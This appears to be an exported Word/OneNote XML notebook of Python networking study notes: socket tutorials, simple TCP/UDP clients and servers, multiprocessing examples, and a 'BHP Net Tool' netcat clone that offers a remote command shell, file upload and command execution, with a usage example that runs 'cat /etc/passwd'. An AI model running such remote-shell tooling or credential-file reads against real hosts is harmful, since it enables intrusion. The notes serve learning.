    <w:p w14:paraId="73207CD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0615A6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76C9957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71D53033" w14:textId="19204E68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Utilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA7032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142F9A0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4:32 PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0133AE65" w14:textId="77777777" w:rsidR="00233C26" w:rsidRPr="00095BB5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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B61B9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34DC4A8" w14:textId="6C4362DD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Modules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="597E1A9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55CE666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4:31 PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A3C391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3670AD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3187C27" w14:textId="6EFD5360" w:rsidR="00233C26" w:rsidRDefault="005D412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Web </w:t>
      </w:r>
      <w:r w:rsidR="00233C26">
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Socket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D5FC30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February 7, 2024</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC9BBB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9:35 AM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F33ED1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66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Python Socket Programming Tutorial 1 - Basics of Networking</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="461C7F3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499A0E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E9E82AC" wp14:editId="7207B84E">
            <wp:extent cx="3378200" cy="1892300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="109" name="Pictur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7D79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0680C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6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Python Socket Programming Tutorial</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4687A36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C951823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D366E8A" wp14:editId="1C3B74AF">
            <wp:extent cx="3378200" cy="1892300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="110" name="Pictur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CF8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BE46B1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DA28A46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14EC57E6" w14:textId="07748F1A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handling-tcp-client.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F4DB8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5196ED7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10:47 PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2620A7C7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D143F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socket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7028A62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main</w:t>
      </w:r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627A2C8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#target_host = "</w:t>
      </w:r>
      <w:hyperlink r:id="rId170" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
            <w:color w:val="6A9955"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>www.google.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="6A9955"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040C4B6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target_host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'Enter target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Url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[</w:t>
      </w:r>
      <w:hyperlink r:id="rId171" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
            <w:color w:val="CB8F76"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>www.google.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="CB8F76"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>]: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6B6A0D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#target_port = 80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0746195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'Enter port [80]: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746533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#target_port = int(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target_port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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF3BC4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5489B77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425056B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F1BF92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0F3165D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except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ValueError</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="47B7A0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751CD6C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'Port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number must be an integer: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E694D5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return</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C7E3F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0782000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socket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21470ED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with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socket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AF_INET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SOCK_STREAM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E10235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14:paraId="0C28C26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connect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target_host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))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B5F42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14:paraId="6964721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request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'GET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/ HTTP/1.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="AB9464"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>\r\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Host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target_host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\r\n\r\n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="CB8F76"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7A4BE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14:paraId="67BEAB7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# encoded ASCII bytes sending to client</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C3F5A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request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encode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())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B4CFB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14:paraId="23910EC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# Receiving ASCII bytes from client using a chunk of 4096 bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF0885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response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recv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4096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CAC27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14:paraId="337D29D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3BC09E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# Printing decoded ASCII bytes in response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD5D8F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'Response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AB9464"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>\n\n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response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decode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9F1259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Handling socket get address info (gai) error related to DNS resolution ;)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="033CE67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except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gaierror</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="47B7A0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5262CC7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'Hostname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could not be resolved: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34B75A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Handling socket error</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70EE93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except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error</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="72A1BA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0BA6995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'Socket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error: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1559D2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Handling Exception error</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C7AFFB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except </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="47B7A0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Exception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5B0F6C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'An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unknown error occurred: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0F9292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51ADBC9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r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="72A1BA"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>__name__</w:t>
      </w:r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CB8F76"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'__main__'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11283EB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main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4FFA371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1F391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1DD8D0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6B79354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3FE449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C9AB75C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netcat.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0679487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75DD193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10:48 PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E1CA6EC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C3C8D1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argparse</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="69FC9D2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socket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B25515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shlex</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="01AF03C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subprocess</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="322FA19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sys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6857B4B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textwrap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="07BDAA0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threading</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1231841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execute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cmd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10A48E1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13EBE33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Trimming all fucking \r\n from Bytes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req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/res</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B79A80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cmd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cmd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="979797"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.strip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652FDA9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77E2196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r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="569CD6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">not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cmd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7F5DEA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return</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6CBE0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5CC4212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If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cmd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object does NOT exist</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B39085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standard error = subprocess standard output</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0601173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check_output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shlex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split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cmd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72A1BA"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>stderr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STDOUT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2E57D1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68FDA85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decode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  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="662FCD2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r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="72A1BA"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>__name__</w:t>
      </w:r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CB8F76"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'__main__'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52DEFA5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argparse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ArgumentParser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</w:p>
    <w:p w14:paraId="4F36778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'BHP Net Tool'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779552E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formatter_class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argparse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RawDescriptionHelpFormatter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369A83B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Using '''Content''' to handle large comment blocks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60BB0F6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Educating users how to parse inputs to this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netcat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python tool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="034B47D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Accept users' inputs in terminal parser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A1030B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Flagging:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A29B10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-t = host</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C78399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-p = port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B45777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-l = listening</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33042F5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-u = upload a file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4299489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-c =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cmd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command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D81B75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-e = execute shell command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44638E8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epilog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textwrap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dedent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'''Example: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A607A0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CB8F76"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="CB8F76"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">                               netcat.py -t 192.168.0.168 -p 5555 -l -c </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22376C3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CB8F76"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="CB8F76"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>                               netcat.py -t 192.168.0.168 -p 5555 -l -u=mytest.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="433E460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B8F76"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>                               netcat.py -t 192.168.0.168 -p 5555 -l -e=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="AB9464"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>\"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="CB8F76"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>cat /etc/passwd"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="471062A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CB8F76"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="CB8F76"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">                               echo "ABC" | ./netcat.py -t 192.168.0.168 -p 135 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA5E67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CB8F76"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="CB8F76"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>                               netcat.py -t 192.168.0.168 -p 5555</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2987C48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B8F76"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>                               '''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88BC36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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D3A45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Handling -c flag command execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4653EB8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add_argument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'-c'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'--command'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action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store_true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help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'command shell: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netcat.py -t 192.168.0.168 -p 5555 -l -c'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C80738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add_argument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'-e'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'--execute'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help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'Execute specified command'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6DD3D8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add_argument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'-l'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'--listen'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action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store_true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help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'listen mode'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08DB64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add_argument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'-p'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'--port'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47B7A0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>int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default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899C7F"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>5555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help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'Specify a port [5555]'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79602D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add_argument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'-t'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'--target'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default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'127.0.0.1'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help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'Specify a host IP'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0F84F3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add_argument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'-u'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'--upload'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help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'Upload a file'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103F20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3F68085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Instantiate arguments from users' inputs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15142AA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parse_args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41B4FB9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5725CA0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args</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="979797"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.listen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5FC3F1B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buffer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''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B1BDEE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7743285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buffer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sys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stdin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666EBAE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10576D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nc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979797"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>NetCat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buffer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encode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())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09AD6CD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5D35B10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FD4239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2C88B94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38673D57" w14:textId="7F9F713F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simple-tcp-client.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA8FD7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4D105CF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10:48 PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07CAC241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88AE14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socket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F113F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target_host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'Enter target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Url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[</w:t>
      </w:r>
      <w:hyperlink r:id="rId172" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
            <w:color w:val="CB8F76"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>www.google.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="CB8F76"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>]: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597ED4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target_port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'Enter port [80]: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075C07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Creating a TCP Socket object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3066482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socket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EEA408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socket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AF_INET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SOCK_STREAM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BBB594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handshake_and_send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host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3D5C125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Handshake =&gt; connect to host using a tuple</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10396E6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connect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host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>))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="064C24A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Sending data as Bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3226007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b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="CB8F76"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'GET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/ HTTP/1.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="AB9464"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>\r\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Host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 google.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="AB9464"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>\r\n\r\n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6ECB61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Receieve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data chunks using 4096 Bytes from host</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72134B0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response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recv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4096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9332DB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Printing decoded ASCII Bytes response as string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6E2A1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response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decode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())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C516EF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Close the socket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1A3BC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close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18739FC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6C64DE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20A71C8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handshake_and_send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target_host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5FEA58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except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OSError</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="47B7A0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5520621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'Error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...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65FDB7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673D05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40C0DC5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simple-tcp-server.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D78FD9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15A50DC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10:48 PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="780D69AB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59BCD0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socket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3515E58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threading</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24125CC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Accept connections from all Layer3 routed traffic ;)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7E331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IP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'0.0.0.0'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="577B737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Custom port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3609823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9998</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D50D4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main</w:t>
      </w:r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796A8D4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socket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07BB5AC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socket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AF_INET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SOCK_STREAM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9973B2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bind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4AB4EE"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>IP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>))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C5D28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3529C90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Listening to 5 Layer3 routed connections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F11D88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listen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AAB80D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'[*] Listening on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AB4EE"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>IP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07B7A5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C12716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while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7A95E6B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Instantiating client, address from server object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C0FA4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address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accept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7D4F7DE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6D9D81D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'[*]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Accetped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connection from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address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]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address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]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E8A480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client_handler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threading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Thread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target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handle_client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=(</w:t>
      </w:r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,))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F92BC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57121E5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6D235C7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client_handler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start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009EAE5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2936ED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handle_client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client_socket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4D10E8A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with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client_socket</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="72A1BA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72A1BA"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>sock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1CBA483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170BE3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Handling client Socket request using reliable chunk of 1024 bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D3D4CB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request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sock</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="979797"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.recv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3B41BE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6F9F8BE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'[*] Received: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request</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="979797"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.decode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'utf-8'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6C77AC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DBE1E5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Sending back Bytes ACK to clients</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="419F386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sock</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="979797"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.send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b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="CB8F76"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'ACK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4440C8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11A2797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r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="72A1BA"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>__name__</w:t>
      </w:r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CB8F76"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'__main__'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211A372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main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05C1944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E613BF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346F922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tcp-server.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D044D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74EF0FB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10:49 PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="123A4D6D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B90AC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socket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12DED59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socket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AF_INET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SOCK_STREAM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9B4301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1234</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A6757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Host a server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF63C0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bind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((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gethostname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(), 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>))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6925B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5D9BE0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D5B910C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udp-client.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD83AE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5E59471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10:49 PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22098258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DA31E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socket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB92CC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target_host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'Enter host IP [127.0.0.1]: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CF7C18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target_port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'Enter port [9997]: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7C8662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target_port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E04E29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Instantiating socket module as Socket object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7528D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socket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45ADDC7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Create a UDP Socket object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39EE7DF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socket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AF_INET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socket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SOCK_DGRAM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D635F4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4BB60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just_send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host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4B933F6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Sending data as Bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF50F5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sendto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b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="CB8F76"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'AAABBBCCC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host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>))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="565B49A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Instantiating data,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addr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from received data chunk of 4096 bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0725C15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recvfrom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4096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E781F5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Printing decoded ASCII Bytes UDP packet response as string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="715757E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decode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())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED3DFB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13AE63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'addr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addr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B9ED1A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Close the socket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06DDCF4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client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close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0666C2C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Connecting to host using a tuple</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F4BCF5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0A5D540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just_send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target_host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target_port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96C94B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except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OSError</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="47B7A0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1590F41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'Error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...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4F1BDA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9055D3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DD63E54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youtube.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F2208A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57B2332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10:49 PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A6216A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73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Writing Malware with Python Part 3 - Socket Module Basics</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="500B94DA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F81B2B" wp14:editId="5C36FFEF">
            <wp:extent cx="3378200" cy="1892300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="111" name="Pictur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520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F09A06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F5C2CD1" w14:textId="029F72D4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Multi-threading</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E30491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February 13, 2024</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D71825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6:57 PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A18B1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75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Python Tutorial - 26. Multithreading - Introduction</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6E628CA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BB00EA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5056052" wp14:editId="7A4D0439">
            <wp:extent cx="3378200" cy="1892300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="112" name="Pictur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02D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BC2F1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68834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480B1B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82F073C" w14:textId="3A04DC20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Multi-processing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F355A6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February 13, 2024</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD9A71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6:57 PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04ECD5E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77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Python Multiprocessing Tutorial: Run Code in Parallel Using the Multiprocessing Module</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0CD60A7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A5CE030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7A8081F" wp14:editId="044C926A">
            <wp:extent cx="3378200" cy="1892300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="113" name="Pictur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3A3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7F2892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Long series</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E85443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79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What is Parallel Programming? | Parallel Programming in Python (Part-1)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0997972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78F6A0C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8999772" wp14:editId="0753A6F7">
            <wp:extent cx="3378200" cy="1892300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="114" name="Pictur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419E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0C1F6E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81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Unlocking your CPU cores in Python (multiprocessing)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7C29C2D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925E5BD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390E33" wp14:editId="3AE28468">
            <wp:extent cx="3378200" cy="1892300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="115" name="Pictur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5FB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9C5054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1668DF1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043754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6F64123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example-1.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="702DC59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2701FE9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10:45 PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="129073F9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ABDC2C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multiprocessing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE5B29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os</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="43013F7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print_cube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21EBC42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'os.getpid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os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getpid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CD1719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'Cube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9FFDB7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279338D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print_square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55F7D34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'os.getpid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os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getpid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F709EA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'Square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E8393C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58C8559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main</w:t>
